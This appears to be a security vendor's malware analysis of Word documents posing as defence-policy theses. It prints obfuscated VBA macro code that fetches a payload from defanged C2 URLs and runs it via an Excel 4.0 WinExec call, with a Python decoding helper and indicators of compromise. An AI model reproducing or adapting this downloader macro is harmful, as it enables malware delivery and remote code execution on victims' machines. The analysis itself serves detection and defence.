The ASEC analysis team has discovered the distribution of malicious Word files disguised as a particular thesis in September. The discovered file is being distributed under the filename “Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc” and contains a malicious macro. The internal macro code has a similar form to that of the following files shared in the past, so it appears that the same attacker is behind all of them.
- Compensation Claim Form.doc (June 29th, ASEC Blog)
- [** Summer Academic Conference]_Profile Template.doc (July 14th, ASEC Blog)
- A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc (September 15th)
- 2 China’s Foreign Policy and the Prospect of U.S.-China Relations.dotm (September 19th)
- Institute for Far Eastern Studies Naumann Foundation Conference Proposal_Send Only (October 12th)
The Word file discovered to be distributed in September consists of the same text as the actual thesis of <A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories>. Judging from the fact that this thesis has the same filename as ‘05_64_1A Yeonbong Jung Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.pdf’ mentioned in the previous blog post of ‘APT Attacks Using PDF Files, Possibly by North Korea Related Group,’ it is likely that the attacker is creating various forms of malware using the same thesis.
Running the file executes the malicious macro inside. This macro is the same as the one in the malicious Word document introduced in the following blog post: Malicious Word Document Disguised as Profile Template File for Summer Academic Conference Being Distributed.
The following is the macro code that exists in the recently discovered Word file ‘A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc’.
Dim qazwsx As Integer
Function sfjksfdgasdfhefgh(data)
    On Error Resume Next
    sfjksfdgasdfhefgh = afghhha(data)
End Function
<omitted>
Sub AutoOpen()
    On Error Resume Next
    asfwqfasfsdafas
    qazwsx = 0
    ujmikl
End Sub
Function ujmikl()
    On Error Resume Next
    If (qazwsx = 0) Then
        <omitted>
        ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
        Set wob = CreateObject("wscript.shell")
        drl = sfjksfdgasdfhefgh("[C2 address encoded with base64]")
        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
        WinHttpReq.Open "GET", drl, False
        WinHttpReq.send
        If WinHttpReq.Status = 200 Then
            gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
            Set ExcelApp = CreateObject("Excel.Application")
            str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi") ' call("kernel32", "WinExec", "JFJ", "wscript //e:vbscript //b ""
            str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
            str11 = Left$(str11, InStr(str11, vbNullChar) - 1)
            ini = Replace(ini, "\", "\\")
            cmd = str9 + ini + str11
            api = ExcelApp.ExecuteExcel4Macro(cmd)
            Sleep 2000
            DeleteFileA ini
        End If
        qazwsx = 1
    End If
End Function
A C2 address encoded with Base64 exists within the macro code. The ‘A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc’ file connects to hxxp://n4028chu.mywebcommunity.org/d.php, decodes the received data with the same routine and saves it to the %APPDATA%\desktop.ini file, then runs it as a VBScript through an Excel 4.0 macro call to WinExec, as the decoded strings in the code above show.
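The base64 fragments in the macro only reveal the Excel 4.0 CALL(WinExec) chain once decoded. The following added analysis helper (not code from the post or from AhnLab) decodes base64-looking string literals in macro source, tolerating the missing padding seen in str11, and flags the markers that characterise this family; the sample macro text and the desktop.ini path are constructed from the listing above.

```python
import base64
import binascii
import re

# Constructed sample: the relevant lines of the macro quoted above, with the
# C2 literal left as the placeholder the post gives.
SAMPLE_MACRO = r'''
drl = sfjksfdgasdfhefgh("[C2 address encoded with base64]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set ExcelApp = CreateObject("Excel.Application")
str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi")
str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
api = ExcelApp.ExecuteExcel4Macro(cmd)
'''

# Markers that only become visible after decoding the base64 fragments.
DECODED_MARKERS = ('call("kernel32"', "winexec", "wscript //e:vbscript")
# Markers visible directly in the macro source.
SOURCE_MARKERS = ("msxml2.serverxmlhttp", "executeexcel4macro", "excel.application")

B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{8,}={0,2})"')

def decode_b64_literal(text):
    """Decode one base64 literal, adding the '=' padding the macro omits (see str11)."""
    padded = text + "=" * (-len(text) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyse_macro(source):
    """Decode every base64-looking literal and report which family markers matched."""
    decoded = [d for d in map(decode_b64_literal, B64_LITERAL.findall(source)) if d]
    haystack = (source + "\n" + "\n".join(decoded)).lower()
    hits = [m for m in DECODED_MARKERS + SOURCE_MARKERS if m in haystack]
    # Three or more markers: the XLM CALL(WinExec) downloader chain is present.
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= 3}

def reconstruct_xlm_call(str9, ini_path, str11):
    """Rebuild cmd = str9 + ini + str11; the macro doubles the path's backslashes first."""
    return str9 + ini_path.replace("\\", "\\\\") + str11

if __name__ == "__main__":
    report = analyse_macro(SAMPLE_MACRO)
    print(report["hits"], report["suspicious"])
    # Assumed path: the post only says the file lands in %APPDATA%\desktop.ini.
    print(reconstruct_xlm_call(report["decoded"][0],
                               r"C:\Users\victim\AppData\Roaming\desktop.ini",
                               report["decoded"][1]))
```

The reconstructed string is what an Excel 4.0 macro telemetry source (for example, AMSI logging of XLM) would record at the moment the macro hands off to wscript.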
This type of malware is being distributed with various filenames as shown below.
- 2 China’s Foreign Policy and the Prospect of U.S.-China Relations.dotm (September 19th)
- Institute for Far Eastern Studies Naumann Foundation Conference Proposal_Send Only (October 12th)
Both files above contain the same malicious macro. As shown below, there is also a Word file whose macro carries additional code on top of that of ‘A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc’, so that the malicious behavior is triggered when a certain key is entered. Apart from this additional code, the variable and function names are the same.
Dim qazwsx As Integer
Function sfjksfdgasdfhefgh(data)
    On Error Resume Next
    sfjksfdgasdfhefgh = afghhha(data)
End Function
<omitted>
Function ujmikl()
    On Error Resume Next
    If (qazwsx = 0) Then
        <omitted>
        ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
        Set wob = CreateObject("wscript.shell")
        drl = sfjksfdgasdfhefgh("[C2 address encoded with base64]")
        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
        WinHttpReq.Open "GET", drl, False
        WinHttpReq.send
<omitted>
Sub FLL()
    Selection.TypeText Text:="a"
    ujmikl
End Sub
Sub G9W()
    Selection.TypeText Text:="b"
    ujmikl
End Sub
Sub GEA()
    Selection.TypeText Text:="c"
    ujmikl
End Sub
<omitted>
The following are the C2 addresses found in malicious Word files containing the identical macro.
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
As shown above, attacks using malicious Word files continue to occur. Because such malicious files contain the actual text of the thesis, users may not recognize that they are malicious. Users therefore need to take extra caution and refrain from executing macros and files from unknown sources.
AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:
[File Detection]
- Downloader/DOC.Agent
- Downloader/DOC.Generic.S1677
[IOC]
- 5eb09dd7aafdd5af5a8396497f99e0e7
- hxxp://n4028chu.mywebcommunity.org/d.php
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php